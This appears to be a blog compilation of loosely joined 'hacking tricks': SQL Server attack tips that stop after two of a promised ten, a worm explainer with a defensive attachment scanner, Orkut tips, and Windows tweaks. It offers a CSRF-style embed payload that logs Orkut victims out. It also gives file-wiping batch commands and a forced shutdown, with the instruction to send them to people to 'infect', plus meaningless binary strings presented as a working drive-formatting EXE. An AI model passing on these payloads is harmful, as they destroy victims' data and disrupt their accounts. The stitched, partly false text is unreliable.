Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason, then, that if the hackers are doing it, you need to carry out the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.


1. Direct connections via the Internet


These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.


2. Vulnerability scanning


Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

What is Double Password?

Strong passwords should have significant length and should not contain normal words, only random digits and letters of different case. Such passwords are extremely hard to remember and take time to enter. But even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read from the keys you hit on your keyboard).



Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.


Save Hard-drive space up to 1/2 GB in Windows Vista

For the few people that can’t hibernate their computer because it automatically resumes, or the ones that just don’t use hibernation, you’ll want to disable this since the feature consumes as much hard-drive space as you have in RAM. A simple command prompt entry can disable hibernation.



1) Click on the Start Pearl > type cmd in the Search Bar > press Ctrl+Shift+Enter


2) Enter powercfg -H off


Once hibernation is off, you’ll still need to use Disk Cleaner to get rid of the files stored on your computer for previous hibernation sessions. To access Disk Cleaner:


1) Open the Start Pearl again and type cleanmgr in the Search bar.


Windows Vista will then prompt you to choose the partition you wish to clean. Select the desired partition, and the rest should be pretty straightforward.



On my computer, hibernation consumed about 510MB. This information is listed under Hibernation File Cleaner. You’ll want to clear all that since you won’t be using hibernation anymore.

How do Worms Work?

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.


Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.


What’s a worm?


A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or another form of software to spread itself over an internal network or through the internet.



How do they spread?


When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).


If you click on the attachment to open it, you’ll activate the worm, but in some versions of Microsoft Outlook, you don’t even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.


After it’s activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program’s address book and web pages you’ve recently looked at, to find them.


Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn’t even have to be open for the worm to spread.


Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.


What do they do?


Most of the damage that worms do is the result of the traffic they create when they’re spreading. They clog e-mail servers and can bring other internet applications to a crawl.


But worms will also do other damage to computer systems if they aren’t cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.


The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.


The target of the original version of the MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO’s proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.


The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.


How do I get rid of them?


The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.


Never open attachments you aren’t expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)
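The attachment-name advice above can also be applied mechanically, for example at a mail gateway or during triage. The following is an added example, not part of the original article: it parses a constructed message with Python's standard `email` module and flags the extensions the article lists plus double endings. The `DECOY` set, the function names and the sample message are assumptions made for illustration.

```python
from email import message_from_string
from email.message import EmailMessage

# Extensions the article singles out as needing extra caution.
RISKY = {".bat", ".cmd", ".exe", ".pif", ".scr", ".vbs", ".zip"}
# Assumption: endings a reader would take for a harmless picture or document.
DECOY = {".jpg", ".jpeg", ".png", ".gif", ".txt", ".doc", ".xls", ".pdf"}


def classify(filename):
    """Return the reasons (possibly none) an attachment name deserves caution."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows ignores trailing dots and spaces, so drop them before parsing.
    name = base.strip().rstrip(". ").lower()
    suffixes = ["." + part for part in name.split(".")[1:]]
    reasons = []
    if suffixes and suffixes[-1] in RISKY:
        reasons.append("risky extension " + suffixes[-1])
    if len(suffixes) >= 2 and suffixes[-2] in DECOY:
        reasons.append("double ending " + "".join(suffixes[-2:]))
    return reasons


def scan(raw_message):
    """Map each suspicious attachment filename in a raw message to its reasons."""
    findings = {}
    for part in message_from_string(raw_message).walk():
        filename = part.get_filename()
        if filename and classify(filename):
            findings[filename] = classify(filename)
    return findings


def build_sample():
    """Constructed message with placeholder attachment bodies (no real payloads)."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Photos"
    msg.set_content("See attached.")
    for name in ("AnnaKournikova.jpg.vbs", "holiday.jpg", "setup.EXE"):
        msg.add_attachment(b"placeholder", maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_string()


if __name__ == "__main__":
    for name, why in scan(build_sample()).items():
        print(name, "->", "; ".join(why))
```

A name check like this is only a first filter: it says nothing about what the attachment contains.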


Also, install anti-virus software and keep it up to date with downloads from the software maker’s website. The updates are usually automatic.


Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.


As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don’t affect computers that run Macintosh or Linux operating systems.


Block your friend's scrapbook - ORKUT

It is really scary to find out that you are not able to reply to your friend's scrap from your own scrapbook. Yes, this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!


Copy this and paste it in your friend's scrapbook.


<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout” height=”1″ width=”1″></embed>


When that person enters his scrapbook, he will be sent to the login page. He can't reply from his scrapbook, and no one can enter his profile and scrap him…


Solution : (To Unblock it)


To avoid being logged off again when you see the scrap, you can block flash in your browser.


For Firefox download the following plugin :
https://addons.mozilla.org/en-US/firefox/addon/433


In Opera, you can disable the Flash plugin.


This will only allow you to enter the scrapbook; your friends will still not be able to scrap you. For that, you need to delete the scrap.


Another Method:


First open your scrapbook.


Now open your Orkut homepage in a new window (don’t close the scrapbook). You will find the login page.


Now enter your details and log in to Orkut.


After logging in, delete the scrap from the scrapbook page that you had kept open.


Enjoy!!!


What to Do When Your Orkut Is Hacked!

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.


Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:



1. Reset Your Google Account Password:


Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.


2. For Google Accounts Associated with Gmail:


If you have problems logging into your Gmail account, you can consider contacting Google by filling in this form. It does, however, require you to remember the exact date when you created that Gmail account.


3. For Hijacked Google Accounts Not Linked to Gmail:

If your Google Account doesn’t use a Gmail address, contact Google by filling in this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will need the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.


It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.


Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined. In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR


If you think you cannot format the C drive when Windows is running, try and you will get it .. anyway, some more so you can test on other drives; this is simple binary code
format c:\ /Q/X — this will format your drive c:\


01100110011011110111001001101101011000010111010000 100000011000110011101001011100


0010000000101111010100010010111101011000


format d:\ /Q/X — this will format your drive d:\


01100110011011110111001001101101011000010111010000 100000011001000011101001011100


0010000000101111010100010010111101011000


format a:\ /Q/X — this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100


0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini — this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001


00100000011000110011101001011100011000100110111101 101111011101000010111001101001


0110111001101001


try to figure out urself rest
cant spoonfeed
its working


Do not try it on your PC. Don’t mess around this is for educational purpose only


still if you cant figure it out try this


go to notepad and type the following:


@Echo off
Del C:\ *.*|y


save it as Dell.bat


want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

